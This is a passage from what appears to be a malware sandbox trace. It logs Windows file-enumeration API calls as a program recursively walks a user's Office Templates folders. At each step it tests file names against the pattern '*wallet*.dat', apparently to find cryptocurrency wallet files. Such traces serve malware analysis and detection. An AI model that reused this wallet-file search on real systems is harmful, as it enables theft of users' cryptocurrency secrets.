cFileName="TM03328998[[fn=Rings]].glox", cAlternateFileName="TM5448~1.GLO")) returned 0 [0207.551] FindClose (in: hFindFile=0x5e7a88 | out: hFindFile=0x5e7a88) returned 1 [0207.552] FindNextFileA (in: hFindFile=0x5e7e88, lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c48439, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c48439, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="1033", cAlternateFileName="")) returned 0 [0207.552] FindClose (in: hFindFile=0x5e7e88 | out: hFindFile=0x5e7e88) returned 1 [0207.552] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19b228 | out: lpFindFileData=0x19b228*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983d5bf8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983d5bf8, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19a218, dwReserved1=0x1, cFileName="Word Document Bibliography Styles", cAlternateFileName="WORDDO~2")) returned 1 [0207.552] PathMatchSpecA (pszFile="Word Document Bibliography Styles", pszSpec="*wallet*.dat") returned 0 [0207.552] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\*", lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983d5bf8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983d5bf8, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7e88 [0207.602] FindNextFileA (in: hFindFile=0x5e7e88, lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d88102, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983d5bf8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983d5bf8, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.602] FindNextFileA (in: hFindFile=0x5e7e88, lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9763f96c, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9763f96c, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9764341c, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x515ca, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM02851216[[fn=apasixtheditionofficeonline]].xsl", cAlternateFileName="TM0285~2.XSL")) returned 1 [0207.603] PathMatchSpecA (pszFile="TM02851216[[fn=apasixtheditionofficeonline]].xsl", pszSpec="*wallet*.dat") returned 0 [0207.603] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851216[[fn=apasixtheditionofficeonline]].xsl\\*", lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9763f96c, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9763f96c, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9764341c, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x515ca, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="TM54Ð\x07\x02")) returned 0xffffffff [0207.603] FindNextFileA (in: hFindFile=0x5e7e88, lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9779cbce, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9779cbce, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9779f2aa, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x486d2, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM02851217[[fn=chicago]].xsl", cAlternateFileName="TM0285~4.XSL")) returned 1 [0207.603] PathMatchSpecA (pszFile="TM02851217[[fn=chicago]].xsl", pszSpec="*wallet*.dat") returned 0 [0207.603] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851217[[fn=chicago]].xsl\\*", lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9779cbce, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9779cbce, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9779f2aa, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x486d2, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="TM54Ð\x07\x02")) returned 0xffffffff [0207.603] FindNextFileA (in: hFindFile=0x5e7e88, lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97625f0b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97625f0b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9762869a, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x4181d, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM02851218[[fn=gb]].xsl", cAlternateFileName="TM0285~1.XSL")) returned 1 [0207.603] PathMatchSpecA (pszFile="TM02851218[[fn=gb]].xsl", pszSpec="*wallet*.dat") returned 0 [0207.603] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851218[[fn=gb]].xsl\\*", lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97625f0b, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x97625f0b, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9762869a, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x4181d, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="TM54Ð\x07\x02")) returned 0xffffffff [0207.603] FindNextFileA (in: hFindFile=0x5e7e88, lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978514f8, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x978514f8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97853bdd, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3e7cc, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM02851219[[fn=gostname]].xsl", cAlternateFileName="TM003E~1.XSL")) returned 1 [0207.603] PathMatchSpecA (pszFile="TM02851219[[fn=gostname]].xsl", pszSpec="*wallet*.dat") returned 0 [0207.604] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851219[[fn=gostname]].xsl\\*", lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978514f8, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x978514f8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x97853bdd, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3e7cc, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="TM54Ð\x07\x02")) returned 0xffffffff [0207.604] FindNextFileA (in: hFindFile=0x5e7e88, lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x976cbe5d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x976cbe5d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x976d0c4a, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3d498, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM02851220[[fn=gosttitle]].xsl", cAlternateFileName="TM0285~3.XSL")) returned 1 [0207.604] PathMatchSpecA (pszFile="TM02851220[[fn=gosttitle]].xsl", pszSpec="*wallet*.dat") returned 0 [0207.604] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851220[[fn=gosttitle]].xsl\\*", lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x976cbe5d, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x976cbe5d, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x976d0c4a, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3d498, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="TM54Ð\x07\x02")) returned 0xffffffff [0207.604] FindNextFileA (in: hFindFile=0x5e7e88, lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x983d213f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983d213f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983d4a29, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x456ff, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM02851221[[fn=harvardanglia2008officeonline]].xsl", cAlternateFileName="TM8026~1.XSL")) returned 1 [0207.604] PathMatchSpecA (pszFile="TM02851221[[fn=harvardanglia2008officeonline]].xsl", pszSpec="*wallet*.dat") returned 0 [0207.604] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851221[[fn=harvardanglia2008officeonline]].xsl\\*", lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x983d213f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x983d213f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x983d4a29, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x456ff, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="TM54Ð\x07\x02")) returned 0xffffffff [0207.604] FindNextFileA (in: hFindFile=0x5e7e88, lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x982fc8d7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x982fc8d7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x982fc8d7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x47d22, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM02851222[[fn=ieee2006officeonline]].xsl", cAlternateFileName="TMA855~1.XSL")) returned 1 [0207.604] PathMatchSpecA (pszFile="TM02851222[[fn=ieee2006officeonline]].xsl", pszSpec="*wallet*.dat") returned 0 [0207.604] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851222[[fn=ieee2006officeonline]].xsl\\*", lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x982fc8d7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x982fc8d7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x982fc8d7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x47d22, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="TM54Ð\x07\x02")) returned 0xffffffff [0207.604] FindNextFileA (in: hFindFile=0x5e7e88, lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98050de7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98050de7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98055ce4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x41f76, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM02851223[[fn=iso690]].xsl", cAlternateFileName="TM536F~1.XSL")) returned 1 [0207.604] PathMatchSpecA (pszFile="TM02851223[[fn=iso690]].xsl", pszSpec="*wallet*.dat") returned 0 [0207.605] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851223[[fn=iso690]].xsl\\*", lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98050de7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98050de7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98055ce4, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x41f76, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="TM54Ð\x07\x02")) returned 0xffffffff [0207.605] FindNextFileA (in: hFindFile=0x5e7e88, lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x977efc44, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x977efc44, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x977f0f37, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x35031, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM02851224[[fn=iso690nmerical]].xsl", cAlternateFileName="TM9858~1.XSL")) returned 1 [0207.605] PathMatchSpecA (pszFile="TM02851224[[fn=iso690nmerical]].xsl", pszSpec="*wallet*.dat") returned 0 [0207.605] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851224[[fn=iso690nmerical]].xsl\\*", lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x977efc44, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x977efc44, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x977f0f37, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x35031, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="TM54Ð\x07\x02")) returned 0xffffffff [0207.605] FindNextFileA (in: hFindFile=0x5e7e88, lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9786c3ef, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9786c3ef, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9786d825, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3e39b, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM02851225[[fn=mlaseventheditionofficeonline]].xsl", cAlternateFileName="TM49BE~1.XSL")) returned 1 [0207.605] PathMatchSpecA (pszFile="TM02851225[[fn=mlaseventheditionofficeonline]].xsl", pszSpec="*wallet*.dat") returned 0 [0207.605] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851225[[fn=mlaseventheditionofficeonline]].xsl\\*", lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9786c3ef, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9786c3ef, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x9786d825, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3e39b, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="TM54Ð\x07\x02")) returned 0xffffffff [0207.605] FindNextFileA (in: hFindFile=0x5e7e88, lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x977a2c28, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x977a2c28, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x977a3fe6, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x540ef, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM02851226[[fn=turabian]].xsl", cAlternateFileName="TME914~1.XSL")) returned 1 [0207.605] PathMatchSpecA (pszFile="TM02851226[[fn=turabian]].xsl", pszSpec="*wallet*.dat") returned 0 [0207.605] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851226[[fn=turabian]].xsl\\*", lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x977a2c28, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x977a2c28, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x977a3fe6, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x540ef, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="TM54Ð\x07\x02")) returned 0xffffffff [0207.605] FindNextFileA (in: hFindFile=0x5e7e88, lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9830edbc, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9830edbc, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98311346, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3d467, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM02851227[[fn=sist02]].xsl", cAlternateFileName="TMC2F6~1.XSL")) returned 1 [0207.605] PathMatchSpecA (pszFile="TM02851227[[fn=sist02]].xsl", pszSpec="*wallet*.dat") returned 0 [0207.605] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Bibliography Styles\\TM02851227[[fn=sist02]].xsl\\*", lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9830edbc, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9830edbc, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98311346, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3d467, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="TM54Ð\x07\x02")) returned 0xffffffff [0207.606] FindNextFileA (in: hFindFile=0x5e7e88, lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9830edbc, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9830edbc, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98311346, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x3d467, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM02851227[[fn=sist02]].xsl", cAlternateFileName="TMC2F6~1.XSL")) returned 0 [0207.606] FindClose (in: hFindFile=0x5e7e88 | out: hFindFile=0x5e7e88) returned 1 [0207.607] FindNextFileA (in: hFindFile=0x5e7e08, lpFindFileData=0x19b228 | out: lpFindFileData=0x19b228*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Word Document Building Blocks", cAlternateFileName="WORDDO~1")) returned 1 [0207.607] PathMatchSpecA (pszFile="Word Document Building Blocks", pszSpec="*wallet*.dat") returned 0 [0207.607] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\*", lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7a88 [0207.607] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.607] FindNextFileA (in: hFindFile=0x5e7a88, lpFindFileData=0x19aba0 | out: lpFindFileData=0x19aba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x985f9d53, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x985f9d53, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="1033", cAlternateFileName="")) returned 1 [0207.607] PathMatchSpecA (pszFile="1033", pszSpec="*wallet*.dat") returned 0 [0207.607] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\*", lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x985f9d53, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x985f9d53, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x5e7808 [0207.609] FindNextFileA (in: hFindFile=0x5e7808, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x985f9d53, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x985f9d53, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0207.609] FindNextFileA (in: hFindFile=0x5e7808, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980dfb29, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x980dfb29, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x980e0ec2, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xca72, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="TM01840907[[fn=Equations]].dotx", cAlternateFileName="TM0184~1.DOT")) returned 1 [0207.609] PathMatchSpecA (pszFile="TM01840907[[fn=Equations]].dotx", pszSpec="*wallet*.dat") returned 0 [0207.609] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\1033\\TM01840907[[fn=Equations]].dotx\\*", lpFindFileData=0x199e90 | out: lpFindFileData=0x199e90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980dfb29, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x980dfb29, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x980e0ec2, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xca72, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="T", cAlternateFileName="J")) returned 0xffffffff [0207.610] FindNextFileA (in: hFindFile=0x5e7808, lpFindFileData=0x19a518 | out: lpFindFileData=0x19a518*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980cc2bb, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x980cc2bb, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x980cc2bb, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0xb8c0, 